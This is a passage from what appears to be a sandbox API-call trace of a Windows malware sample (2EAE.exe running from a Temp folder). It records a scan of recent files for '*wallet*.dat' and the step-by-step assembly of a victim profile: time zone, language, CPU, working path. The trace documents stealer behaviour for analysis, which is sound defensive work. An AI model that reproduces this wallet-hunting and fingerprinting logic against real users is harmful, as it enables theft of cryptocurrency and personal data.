pszSpec="*wallet*.dat") returned 0 [0175.657] PathMatchSpecA (pszFile="3kac.lnk", pszSpec="*wallet*.dat") returned 0 [0175.657] PathMatchSpecA (pszFile="4Hw1.lnk", pszSpec="*wallet*.dat") returned 0 [0175.657] PathMatchSpecA (pszFile="4nzMmzxedHQ4CQWNa.lnk", pszSpec="*wallet*.dat") returned 0 [0175.658] PathMatchSpecA (pszFile="4Or3_3Bk7l.lnk", pszSpec="*wallet*.dat") returned 0 [0175.658] PathMatchSpecA (pszFile="5prTOmnPgTwgG.flv.lnk", pszSpec="*wallet*.dat") returned 0 [0175.658] PathMatchSpecA (pszFile="5RwoDPS8u2I3lhJ.lnk", pszSpec="*wallet*.dat") returned 0 [0175.658] PathMatchSpecA (pszFile="5Y8DSj bEDMXxz3BH6r4.lnk", pszSpec="*wallet*.dat") returned 0 [0175.658] PathMatchSpecA (pszFile="66WxqGXN3S.lnk", pszSpec="*wallet*.dat") returned 0 [0175.658] PathMatchSpecA (pszFile="6s8y1.lnk", pszSpec="*wallet*.dat") returned 0 [0175.658] PathMatchSpecA (pszFile="6z6KteukvTGQB7hYrod.lnk", pszSpec="*wallet*.dat") returned 0 [0175.658] PathMatchSpecA (pszFile="77HjyjVgIF1sRPxRUpV.flv.lnk", pszSpec="*wallet*.dat") returned 0 [0175.658] PathMatchSpecA (pszFile="84MxfwewbUx3-sbkEi.lnk", pszSpec="*wallet*.dat") returned 0 [0175.659] PathMatchSpecA (pszFile="8kfgPx.lnk", pszSpec="*wallet*.dat") returned 0 [0175.659] PathMatchSpecA (pszFile="8LZqb9.lnk", pszSpec="*wallet*.dat") returned 0 [0175.659] PathMatchSpecA (pszFile="9r_NDeoMzC.flv.lnk", pszSpec="*wallet*.dat") returned 0 [0175.659] PathMatchSpecA (pszFile="aoWjH.lnk", pszSpec="*wallet*.dat") returned 0 [0175.659] PathMatchSpecA (pszFile="AutomaticDestinations", pszSpec="*wallet*.dat") returned 0 [0175.659] PathMatchSpecA (pszFile="162797d679096999.automaticDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0175.659] PathMatchSpecA (pszFile="1b6ebacd7cd2f25a.automaticDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0175.659] PathMatchSpecA (pszFile="1bc9bbbe61f14501.automaticDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0175.659] PathMatchSpecA (pszFile="319f01bf9fe00f2d.automaticDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0175.660] PathMatchSpecA (pszFile="5175b273ceba776b.automaticDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0175.660] PathMatchSpecA (pszFile="5f7b5f1e01b83767.automaticDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0175.660] PathMatchSpecA (pszFile="61ebb1e65cfcb8da.automaticDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0175.660] PathMatchSpecA (pszFile="6d2bac8f1edf6668.automaticDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0175.660] PathMatchSpecA (pszFile="75668a91ce73b054.automaticDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0175.660] PathMatchSpecA (pszFile="78f0afb5bd4bb278.automaticDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0175.660] PathMatchSpecA (pszFile="7e4dca80246863e3.automaticDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0175.660] PathMatchSpecA (pszFile="80d13f95c2c02af9.automaticDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0175.660] PathMatchSpecA (pszFile="9c08ad74ad8708df.automaticDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0175.660] PathMatchSpecA (pszFile="9cfafb05ce914942.automaticDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0175.661] PathMatchSpecA (pszFile="9d1f905ce5044aee.automaticDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0175.661] PathMatchSpecA (pszFile="b8ab77100df80ab2.automaticDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0175.661] PathMatchSpecA (pszFile="b8b3a97bfbf120b6.automaticDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0175.661] PathMatchSpecA (pszFile="d00655d2aa12ff6d.automaticDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0175.661] PathMatchSpecA (pszFile="f01b4d95cf55d32a.automaticDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0175.661] PathMatchSpecA (pszFile="fb3b0dbfee58fac8.automaticDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0175.661] PathMatchSpecA (pszFile="a_XIaGDvQDzZRn7ti5.lnk", pszSpec="*wallet*.dat") returned 0 [0175.661] PathMatchSpecA (pszFile="bhYV-wEZC.lnk", pszSpec="*wallet*.dat") returned 0 [0175.661] PathMatchSpecA (pszFile="BIOI0ahnXh3AtKg-C1.lnk", pszSpec="*wallet*.dat") returned 0 [0175.661] PathMatchSpecA (pszFile="BjZUuWpqqN.lnk", pszSpec="*wallet*.dat") returned 0 [0175.661] PathMatchSpecA (pszFile="BuFXfwY9.lnk", pszSpec="*wallet*.dat") returned 0 [0175.662] PathMatchSpecA (pszFile="c3QLJYNyqtrzdB8jn.lnk", pszSpec="*wallet*.dat") returned 0 [0175.662] PathMatchSpecA (pszFile="c5QFAct2pp512q_9qov.lnk", pszSpec="*wallet*.dat") returned 0 [0175.662] PathMatchSpecA (pszFile="Ce6bgw-v-2k.lnk", pszSpec="*wallet*.dat") returned 0 [0175.662] PathMatchSpecA (pszFile="CnzcmP4GDpEDb.lnk", pszSpec="*wallet*.dat") returned 0 [0175.662] PathMatchSpecA (pszFile="Common Files.lnk", pszSpec="*wallet*.dat") returned 0 [0175.662] PathMatchSpecA (pszFile="CrbhhoBuck5oco.lnk", pszSpec="*wallet*.dat") returned 0 [0175.662] PathMatchSpecA (pszFile="CustomDestinations", pszSpec="*wallet*.dat") returned 0 [0175.663] PathMatchSpecA (pszFile="7e4dca80246863e3.customDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0175.663] PathMatchSpecA (pszFile="9149d0f5ebf7f710.customDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0175.663] PathMatchSpecA (pszFile="9d1f905ce5044aee.customDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0175.663] PathMatchSpecA (pszFile="f01b4d95cf55d32a.customDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0175.663] PathMatchSpecA (pszFile="cuw0CV_5W5cW.lnk", pszSpec="*wallet*.dat") returned 0 [0175.663] PathMatchSpecA (pszFile="CxSG-.lnk", pszSpec="*wallet*.dat") returned 0 [0175.663] PathMatchSpecA (pszFile="CYGYAuAS-.flv.lnk", pszSpec="*wallet*.dat") returned 0 [0175.663] PathMatchSpecA (pszFile="CzbUXF1zuBcVKYJ9.lnk", pszSpec="*wallet*.dat") returned 0 [0175.663] PathMatchSpecA (pszFile="D1fQIB.lnk", pszSpec="*wallet*.dat") returned 0 [0175.664] PathMatchSpecA (pszFile="D7M-aIoJwk.lnk", pszSpec="*wallet*.dat") returned 0 [0175.664] PathMatchSpecA (pszFile="desktop.ini", pszSpec="*wallet*.dat") returned 0 [0175.664] PathMatchSpecA (pszFile="DKhG.lnk", pszSpec="*wallet*.dat") returned 0 [0175.664] PathMatchSpecA (pszFile="DyCxWki.lnk", pszSpec="*wallet*.dat") returned 0 [0175.664] PathMatchSpecA (pszFile="Ea3kc6etdmVnP.flv.lnk", pszSpec="*wallet*.dat") returned 0 [0175.664] PathMatchSpecA (pszFile="eBp43DvWbTFj-gr5YIy.lnk", pszSpec="*wallet*.dat") returned 0 [0175.745] GetProcessHeap () returned 0x4c0000 [0175.745] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0xf423f) returned 0xec8e020 [0175.748] lstrcatA (in: lpString1="", lpString2="Tag: " | out: lpString1="Tag: ") returned="Tag: " [0175.748] lstrcatA (in: lpString1="Tag: ", lpString2="Default" | out: lpString1="Tag: Default") returned="Tag: Default" [0175.748] lstrcatA (in: lpString1="Tag: Default", lpString2="\n\n" | out: lpString1="Tag: Default\n\n") returned="Tag: Default\n\n" [0175.748] lstrcatA (in: lpString1="Tag: Default\n\n", lpString2="IP: IP?" | out: lpString1="Tag: Default\n\nIP: IP?") returned="Tag: Default\n\nIP: IP?" [0175.749] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\n") returned="Tag: Default\n\nIP: IP?\n" [0175.749] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\n", lpString2="Country: Country?" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?") returned="Tag: Default\n\nIP: IP?\nCountry: Country?" [0175.749] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?", lpString2="\n\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\n" [0175.749] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\n", lpString2="Working Path: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: " [0175.749] GetCurrentProcessId () returned 0x14c [0175.749] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x14c) returned 0x254 [0175.749] GetModuleFileNameExA (in: hProcess=0x254, hModule=0x0, lpFilename=0x1986dc, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\2eae.exe")) returned 0x2d [0175.750] CloseHandle (hObject=0x254) returned 1 [0175.750] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: ", lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe" [0175.750] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe", lpString2="\n\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\n" [0175.750] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\n", lpString2="Local Time: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: " [0175.750] GetProcessHeap () returned 0x4c0000 [0175.750] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x104) returned 0x504268 [0175.750] GetLocalTime (in: lpSystemTime=0x1987e0 | out: lpSystemTime=0x1987e0*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x3, wDay=0x3, wHour=0x13, wMinute=0x20, wSecond=0x26, wMilliseconds=0x33e)) [0175.750] wsprintfA (in: param_1=0x504268, param_2="%d/%d/%d %d:%d:%d" | out: param_1="3/8/2022 19:32:44") returned 17 [0175.750] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: ", lpString2="3/8/2022 19:32:44" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44" [0175.750] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\n" [0175.750] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\n", lpString2="TimeZone: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: " [0175.750] GetProcessHeap () returned 0x4c0000 [0175.750] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x104) returned 0x501628 [0175.750] GetTimeZoneInformation (in: lpTimeZoneInformation=0x198740 | out: lpTimeZoneInformation=0x198740) returned 0x2 [0175.750] wsprintfA (in: param_1=0x501628, param_2="UTC%d" | out: param_1="UTC1") returned 4 [0175.750] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: ", lpString2="UTC1" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1" [0175.750] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1", lpString2="\n\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\n" [0175.750] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\n", lpString2="Display Language: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: " [0175.750] GetUserDefaultLocaleName (in: lpLocaleName=0x198738, cchLocaleName=85 | out: lpLocaleName="en-US") returned 6 [0175.750] LocalAlloc (uFlags=0x40, uBytes=0x5) returned 0x4e4d70 [0175.750] CharToOemW (in: pSrc="en-US", pDst=0x4e4d70 | out: pDst="en-US") returned 1 [0175.751] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: ", lpString2="en-US" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US" [0175.751] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\n" [0175.751] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\n", lpString2="Keyboard Languages: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: " [0175.751] GetProcessHeap () returned 0x4c0000 [0175.751] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x1f4) returned 0x4fd7b0 [0175.751] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0175.753] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4e4c20 [0175.753] GetKeyboardLayoutList (in: nBuff=1, lpList=0x4e4c20 | out: lpList=0x4e4c20) returned 1 [0175.753] GetLocaleInfoA (in: Locale=0x409, LCType=0x2, lpLCData=0x1985e8, cchData=512 | out: lpLCData="English (United States)") returned 24 [0175.787] wsprintfA (in: param_1=0x4fd7b0, param_2="%s" | out: param_1="English (United States)") returned 23 [0175.787] LocalFree (hMem=0x4e4c20) returned 0x0 [0175.787] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: ", lpString2="English (United States)" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)" [0175.787] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)", lpString2="\n\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\n" [0175.787] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\n", lpString2="Is Laptop: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: " [0175.787] GetSystemPowerStatus (in: lpSystemPowerStatus=0x1987e4 | out: lpSystemPowerStatus=0x1987e4) returned 1 [0175.787] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: ", lpString2="No" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No" [0175.788] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\n" [0175.788] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\n", lpString2="Processor: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: " [0175.788] GetProcessHeap () returned 0x4c0000 [0175.788] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x104) returned 0x4fd9b0 [0175.788] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", ulOptions=0x0, samDesired=0x20119, phkResult=0x1987ec | out: phkResult=0x1987ec*=0x254) returned 0x0 [0175.788] RegQueryValueExA (in: hKey=0x254, lpValueName="ProcessorNameString", lpReserved=0x0, lpType=0x0, lpData=0x4fd9b0, lpcbData=0x1987e8*=0xff | out: lpType=0x0, lpData=0x4fd9b0*=0x49, lpcbData=0x1987e8*=0x28) returned 0x0 [0175.788] RegCloseKey (hKey=0x254) returned 0x0 [0175.788] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: ", lpString2="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" [0175.789] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\n" [0175.789] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 